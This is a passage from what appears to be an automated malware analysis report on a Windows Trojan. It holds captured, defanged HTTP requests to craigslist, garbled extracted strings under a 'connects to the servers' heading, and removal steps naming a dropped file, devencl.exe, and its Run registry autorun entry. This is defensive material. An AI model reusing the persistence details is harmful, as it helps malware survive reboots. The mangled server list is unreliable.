Date: Sat, 24 Sep 2016 09:57:43 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 7544
Content-Type: text/css; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Mon, 24 Oct 2016 09:57:43 GMT
<<< skipped >>>
GET /js/json2.min.js?v=178d4ad319e0e0b4a451b15e49b71bec HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Sun, 25 Sep 2016 18:57:15 GMT
Date: Sun, 25 Sep 2016 18:57:15 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 1328
Content-Type: application/x-javascript; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Server: Apache
Expires: Tue, 25 Oct 2016 18:57:15 GMT
<<< skipped >>>
GET /static/localstorage.html?v=51a29e41f8e978141e4085ed4a77d170 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public
Last-Modified: Tue, 11 Oct 2016 22:53:26 GMT
Date: Tue, 11 Oct 2016 22:53:26 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 508
Content-Type: text/html; charset=UTF-8
Server: Apache
Expires: Thu, 10 Nov 2016 22:53:26 GMT
<<< skipped >>>
GET /images/sprite-16px.png HTTP/1.1
Accept: */*
Referer: hXXp://ukraine.craigslist.org/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.craigslist.org
Connection: Keep-Alive
Cookie: cl_b=POtOauaR5hG8X8yh_3GNqwjCTSo; cl_def_hp=ukraine
HTTP/1.1 200 OK
Cache-control: public, max-age=86400
Last-Modified: Thu, 13 Oct 2016 20:38:20 GMT
Accept-Ranges: bytes
Date: Thu, 13 Oct 2016 23:15:20 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 6355
Content-Type: image/png
X-Frame-Options: SAMEORIGIN
Server: Apache
<<< skipped >>>
The Trojan connects to the servers at the following location(s):
%?9-*09,*19}*09
.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG;33;33;0
8888880
8887080
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1524
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Cookies\Current_User@craigslist[2].txt (334 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\respond-fork.min[1].js (328 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\cl[1].css (2523 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery-ui-clcustom[1].css (338 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\sprite-16px[1].png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepage[1].css (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\json2.min[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\homepage[1].css (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jquery-ui-clcustom[1].css (1390 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\homepage-concat.min[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\ukraine.craigslist[1].htm (1117 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\localstorage[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@craigslist[1].txt (184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\cl[1].css (276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\html5shiv.min[1].js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\general-concat.min[1].js (15737 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\localstorage[1].html (508 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\devencl.exe (7800 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"devencl.exe" = "%Documents and Settings%\%current user%\Application Data\Microsoft\devencl.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.